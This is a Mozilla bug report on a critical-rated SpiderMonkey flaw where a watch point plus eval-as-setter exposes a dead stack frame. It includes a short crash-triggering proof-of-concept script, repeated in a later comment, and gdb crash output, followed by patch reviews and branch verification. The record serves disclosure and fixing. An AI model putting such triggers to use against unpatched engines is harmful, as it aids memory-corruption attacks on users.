Bug 390597 (Closed): watch point + eval-as-setter allows access to dead JSStackFrame
Opened 17 years ago, closed 17 years ago
Categories: Core :: JavaScript Engine, defect
Status: VERIFIED FIXED
People: Reporter: sync2d, Assigned: mrbkap
Details: 4 keywords, Whiteboard: [sg:critical?]
Attachments (3 files):
  - patch, 1.22 KB: brendan: review+; brendan: approval1.9+
  - text/plain, 2.64 KB
  - patch, 1.22 KB: mrbkap: review+; dveditz: approval1.8.1.12+; asac: approval1.8.0.next+
$ cat watch-point-dead-stack.txt
function exploit() {
    var obj = this, args = null;
    obj.__defineSetter__("evil", eval);
    obj.watch("evil", function() { return "args = arguments;"; });
    obj.evil = null;
    eval("print(args[0]);");
}
exploit();

$ gdb --eval run --args dbg.obj/js watch-point-dead-stack.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x0043729b in JS_GetReservedSlot (cx=<incomplete type>, obj=0x1, index=0, vp=0xa4e2cc) at jsapi.c:3971
3971        clasp = OBJ_GET_CLASS(cx, obj);
Comment 1 (Assignee)•17 years ago
Wow, I didn't know it was possible to create an arguments object for the pseudo-frame. It's getting to be more and more like a real frame every day!
Comment 2•17 years ago
Comment on attachment 275031 [details] [diff] [review] FIx
Indeed. Need to be careful there isn't more like this (I don't know of any, just sayin'). /be
Attachment #275031 - Flags: review?(brendan)
Attachment #275031 - Flags: review+
Attachment #275031 - Flags: approval1.9?
Comment 3•17 years ago
Comment on attachment 275031 [details] [diff] [review] FIx
Sorry, a=me. /be
Attachment #275031 - Flags: approval1.9? → approval1.9+
Comment 4 (Assignee)•17 years ago
Fix checked into trunk, finally.
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
Comment 5•17 years ago
I am sure this is a stoopid question, but why does the browser throw "EvalError: function eval must be called directly, and not by way of a function of another name" but the shell doesn't?
Updated•17 years ago
Flags: in-testsuite+
Comment 6 (Assignee)•17 years ago
Sounds like another XOW problem. Try using 'obj.eval' as the setter function?
Comment 7•17 years ago
(In reply to comment #6)
> Sounds like another XOW problem. Try using 'obj.eval' as the setter function?

That removed the EvalError. Bug?
Comment 8 (Assignee)•17 years ago
Yeah, it's a bug.
Comment 9•17 years ago
bug 397071
Comment 10•17 years ago
Verified fixed 1.9.0 linux/mac*/win. This crashes in the browser 1.8.1. Do we want it on the branch?
Status: RESOLVED → VERIFIED
Updated•17 years ago
Flags: blocking1.8.1.9?
Updated•17 years ago
Flags: blocking1.8.1.10?
Comment 11•17 years ago
blake, brendan: does this patch work for the 1.8 branch or do we need a different fix (or none)? Can we land this in a day or two, or should we wait for 1.8.1.11?
Whiteboard: [sg:critical?]
Updated•17 years ago
Flags: blocking1.8.1.10?
Updated•17 years ago
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.12?
Flags: blocking1.8.1.12+
Comment 12•17 years ago
If this patch applies to the 1.8 branch can you please request approval? Otherwise, please attach a branch patch. (QA: To test, use the JS 'shell' bookmarklet.)
Keywords: testcase
Whiteboard: [sg:critical?] → [sg:critical?] [need 1.8 branch patch]
Comment 13 (Assignee)•17 years ago
I had to hand merge because the watchpoint thread-safety fixes never went in on the 1.8 branch. The patch was trivial to merge.
Attachment #294507 - Flags: review+
Attachment #294507 - Flags: approval1.8.1.12?
Updated•17 years ago
Whiteboard: [sg:critical?] [need 1.8 branch patch] → [sg:critical?]
Comment 14•17 years ago
Comment on attachment 294507 [details] [diff] [review] 1.8 branch patch
approved for 1.8.1.12, a=dveditz for release-drivers
Attachment #294507 - Flags: approval1.8.1.12? → approval1.8.1.12+
I crashed 2.0.0.11 by pasting (with much-cleaner linebreaks!):

function exploit() {
    try {
        var obj = this, args = null;
        obj.__defineSetter__("evil", eval);
        obj.watch("evil", function() { return "args = arguments;"; });
        obj.evil = null;
        eval("print(args[0]);");
    } catch(ex) {
        print('Caught ' + ex);
    }
}
exploit();

into Jesse's handy JS "shell" bookmarklet, on Windows XP. With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080128 Firefox/2.0.0.12, I get |undefined|, and no crash. Replacing fixed1.8.1.12 with verified1.8.1.12; special thanks to bc for the support/sanity-checking.
Keywords: fixed1.8.1.12 → verified1.8.1.12
Updated•17 years ago
Group: security
Updated•16 years ago
Flags: blocking1.8.0.15+
Comment 17•16 years ago
Comment on attachment 294507 [details] [diff] [review] 1.8 branch patch
a=asac for 1.8.0.15 (unmodified distro patch)
Attachment #294507 - Flags: approval1.8.0.15+
Comment 18•16 years ago
MOZILLA_1_8_0_BRANCH:
Checking in js/src/jsdbgapi.c;
/cvsroot/mozilla/js/src/jsdbgapi.c,v  <--  jsdbgapi.c
new revision: 3.56.2.1.4.13; previous revision: 3.56.2.1.4.12
done
Keywords: fixed1.8.0.15
Comment 19•16 years ago
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-390597.js,v  <--  regress-390597.js
initial revision: 1.1